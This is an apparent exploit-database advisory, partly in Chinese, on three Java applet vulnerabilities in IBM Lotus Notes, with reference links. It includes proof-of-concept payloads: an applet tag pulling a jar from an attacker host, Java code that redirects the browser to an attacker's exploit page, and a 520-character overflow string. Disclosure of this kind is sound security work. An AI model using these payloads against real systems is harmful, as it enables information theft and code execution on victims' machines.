https://www.exploit-db.com/exploits/24275
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-993

LotusDomino/Notes服务器是一款基于WEB合作的应用程序架构，运行在Linux/Unix和MicrosoftWindows操作系统平台下。IBMLotusNotes存在三个未明漏洞，远程攻击者可以利用这些漏洞破坏LotusNotes。目前没有详细漏洞细节提供。

source: http://www.securityfocus.com/bid/10704/info

IBM Lotus Notes is affected by three vulnerabilities concerning Java applets.

An attacker can exploit these issues to disclose potentially sensitive information, cause a web browser to open an arbitrary web page, and cause a stack-based buffer overflow that may be exploited to execute arbitrary code.

IBM has confirmed these vulnerabilities and has stated that they are currently under investigation. IBM problem reports for these vulnerabilities are KSPR5YS6GR, KSPR62F4D3, and KSPR62F4KN. 

<applet codebase="file:///" archive="http://www.attacker.tld/applet.jar" width="1" height="1"></applet>

Arbitrary browser opening:
public void init() {
getAppletContext().showDocument("http://www.attacker.tld/ie-exploits.html");
}

Stack-based buffer overflow:
<applet codebase="A:AAAAAAAAAAAAAAA( repeat 520 A's )AAAAAA" code="java.applet.Applet" width=100 height=100></applet>

来源:OSVDB
名称:8418
链接:http://www.osvdb.org/8418
来源:www-1.ibm.com
链接:http://www-1.ibm.com/support/docview.wss?rs=475&context;=SSKTWP&q1;=Java&uid;=swg21173910&loc;=en_US&cs;=utf-8〈=en
来源:SECUNIA
名称:12046
链接:http://secunia.com/advisories/12046
来源:BID
名称:10704
链接:http://www.securityfocus.com/bid/10704
来源：NSFOCUS
名称：6700
链接：http://www.nsfocus.net/vulndb/6700